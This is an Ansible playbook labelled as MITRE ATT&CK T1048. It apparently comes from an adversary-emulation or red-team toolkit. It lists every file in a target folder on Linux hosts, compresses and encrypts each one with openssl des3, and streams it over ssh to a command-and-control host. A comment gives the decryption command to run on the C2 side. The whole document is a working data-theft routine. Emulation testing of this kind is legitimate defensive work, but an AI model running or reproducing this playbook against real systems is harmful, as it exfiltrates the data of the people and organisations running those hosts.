
# Playbook-T1048-Chunk
- name : Exfiltration Over Alternative Protocol in chunk over time
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: Ansible check directory exists example.
      stat:
        path: "{{ exfiltration_folder }}"
      register: exfil_check
    - name: Grab files names form exfiltration_folder
      shell: (cd {{ exfiltration_folder }}; find . -maxdepth 1 -type f) | cut -d'/' -f2
      register: exfil_files
    - shell: |
        cd {{ exfiltration_folder }}
        tar czpf - {{ item }} | openssl des3 -salt -k {{ password_encryption }} | ssh {{ cnc_fqdn }} 'cat > {{ exfiltration_file }}-{{ item }}.tar.gz.enc'
      with_items: "{{ exfil_files.stdout_lines }}"
      when: exfil_check.stat.exists
# decrypt file on cnc: openssl des3 -d -salt -k {{ password_encryption }} -in {{ exfiltration_file }}.tar.gz.enc -out {{ exfiltration_file }}tar.gz    
